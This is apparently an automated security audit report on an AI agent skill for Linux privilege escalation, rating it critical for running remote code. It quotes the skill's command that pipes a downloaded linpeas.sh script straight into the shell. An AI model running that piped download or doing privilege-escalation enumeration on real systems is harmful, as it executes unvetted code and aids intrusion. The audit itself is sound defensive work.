Skills
skills/davila7/claude-code-templates/Linux Privilege Escalation/Gen Agent Trust Hub

Linux Privilege Escalation

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • Remote Code Execution (CRITICAL): The skill utilizes a piped shell command to execute remote code. Specifically, it runs curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh, which allows an external script to run with the permissions of the agent process without any validation or integrity checks.
  • Unverifiable Dependencies (CRITICAL): The download source https://github.com/carlospolop is not part of the established Trusted GitHub Organizations. Executing code from third-party, non-whitelisted repositories represents a severe supply chain risk.
  • Privilege Escalation (HIGH): The targeted script, linpeas.sh, is a specialized tool designed to search for privilege escalation vulnerabilities on Linux systems. In the context of an AI skill, this behavior is highly suspicious and indicative of malicious intent or a security-testing tool being misused.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 17, 2026, 05:04 PM